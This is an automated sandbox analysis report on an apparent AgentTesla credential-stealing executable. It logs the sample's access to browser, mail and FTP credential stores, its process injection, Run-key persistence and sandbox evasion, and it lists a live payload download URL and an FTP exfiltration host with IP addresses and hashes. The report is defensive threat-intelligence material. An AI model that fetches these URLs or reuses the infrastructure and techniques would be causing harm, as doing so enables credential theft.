                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8048, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8048, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    211
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Credentials in Registry
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    21
                    Obfuscated Files or Information
                    Security Account Manager311
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder
                    2
                    Software Packing
                    NTDS12
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Process Discovery
                    SSHKeylogging13
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529933 Sample: GEFA-Order 232343-68983689.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 30 ftp.alternatifplastik.com 2->30 32 rubberpartsmanufacturers.com 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 11 other signatures 2->52 7 GEFA-Order 232343-68983689.exe 16 4 2->7         started        12 Fqhnalw.exe 14 2 2->12         started        14 Fqhnalw.exe 2 2->14         started        signatures3 process4 dnsIp5 34 rubberpartsmanufacturers.com 103.191.208.122, 443, 49727, 49818 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 7->34 24 C:\Users\user\AppData\Roaming\Fqhnalw.exe, PE32 7->24 dropped 26 C:\Users\user\...\Fqhnalw.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Injects a PE file into a foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Antivirus detection for dropped file 12->60 62 Multi AV Scanner detection for dropped file 12->62 64 Machine Learning detection for dropped file 12->64 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49766, 49775 ALASTYRTR Turkey 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    GEFA-Order 232343-68983689.exe21%ReversingLabs
                    GEFA-Order 232343-68983689.exe100%AviraHEUR/AGEN.1309900
                    GEFA-Order 232343-68983689.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Fqhnalw.exe100%AviraHEUR/AGEN.1309900
                    C:\Users\user\AppData\Roaming\Fqhnalw.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Fqhnalw.exe32%ReversingLabsWin32.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s-part-0044.t-0009.fb-t-msedge.net
                    13.107.253.72
                    truefalse
                      unknown
                      ftp.alternatifplastik.com
                      5.2.84.236
                      truetrue
                        unknown
                        rubberpartsmanufacturers.com
                        103.191.208.122
                        truefalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://rubberpartsmanufacturers.com/manxz/Pqbrsrcnsx.mp4false
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/mgravell/protobuf-netGEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://github.com/mgravell/protobuf-netiGEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://stackoverflow.com/q/14436606/23354GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://account.dyn.com/GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://github.com/mgravell/protobuf-netJGEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://rubberpartsmanufacturers.comGEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://stackoverflow.com/q/11564914/23354;GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://stackoverflow.com/q/2152978/23354GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1570412470.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.000000000340C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.000000000320C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      5.2.84.236
                                      ftp.alternatifplastik.comTurkey
                                      3188ALASTYRTRtrue
                                      103.191.208.122
                                      rubberpartsmanufacturers.comunknown
                                      7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1529933
                                      Start date and time:2024-10-09 15:00:44 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 16s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:GEFA-Order 232343-68983689.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                      EGA Information:
                                      • Successful, ratio: 83.3%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 494
                                      • Number of non-executed functions: 27
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target InstallUtil.exe, PID 8048 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: GEFA-Order 232343-68983689.exe
                                      TimeTypeDescription
                                      14:01:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fqhnalw C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                      14:01:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fqhnalw C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      5.2.84.236GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                        Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                          PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                  Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                    PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                      Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          103.191.208.122GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ftp.alternatifplastik.comGEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 5.2.84.236
                                                            s-part-0044.t-0009.fb-t-msedge.netSWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                            • 13.107.253.72
                                                            PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
                                                            • 13.107.253.72
                                                            Change_To_Null.ps1Get hashmaliciousUnknownBrowse
                                                            • 13.107.253.72
                                                            https://ggoryo.com/trade/da.php?11254Get hashmaliciousUnknownBrowse
                                                            • 13.107.253.72
                                                            Scan08.10.24(Massimiliano.benso)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 13.107.253.72
                                                            http://js.schema-forms.orgGet hashmaliciousUnknownBrowse
                                                            • 13.107.253.72
                                                            5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 13.107.253.72
                                                            Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                                            • 13.107.253.72
                                                            TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                            • 13.107.253.72
                                                            https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                            • 13.107.253.72
                                                            rubberpartsmanufacturers.comGEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 103.191.208.122
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ALASTYRTRGEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 5.2.84.236
                                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                            • 5.2.84.221
                                                            AARNET-AS-APAustralianAcademicandResearchNetworkAARNe4wwi2Lh5W4.exeGet hashmaliciousUnknownBrowse
                                                            • 103.169.142.0
                                                            xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                            • 103.186.117.228
                                                            GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 103.191.208.122
                                                            na.elfGet hashmaliciousMiraiBrowse
                                                            • 103.33.73.172
                                                            Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                                                            • 103.67.200.72
                                                            2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                                            • 103.183.119.56
                                                            Quote.exeGet hashmaliciousRemcosBrowse
                                                            • 103.186.117.77
                                                            f8fKadLyb4.elfGet hashmaliciousMiraiBrowse
                                                            • 150.203.163.29
                                                            zYJYK66EGb.exeGet hashmaliciousRemcosBrowse
                                                            • 103.186.116.195
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 134.150.211.105
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eGsZkXAmf61.exeGet hashmaliciousCelestial RatBrowse
                                                            • 103.191.208.122
                                                            Rechnung-62671596778856538170.vbsGet hashmaliciousPureLog StealerBrowse
                                                            • 103.191.208.122
                                                            kNyZqDECXJ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 103.191.208.122
                                                            MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 103.191.208.122
                                                            https://imago-technologies.com/Get hashmaliciousUnknownBrowse
                                                            • 103.191.208.122
                                                            7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 103.191.208.122
                                                            RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 103.191.208.122
                                                            SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                            • 103.191.208.122
                                                            SAS #U00e7#U0131kt#U0131.PDF.exeGet hashmaliciousUnknownBrowse
                                                            • 103.191.208.122
                                                            TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 103.191.208.122
                                                            No context
                                                            Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):6.02843317883365
                                                            Encrypted:false
                                                            SSDEEP:768:L4lCZTEnqqVW1ZwqBMHlfXfLHTwfxlgqkCWIU:E1qqV8wqevfPWuCG
                                                            MD5:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            SHA1:A87DB0D82F05E80B4511667C01305993D9265806
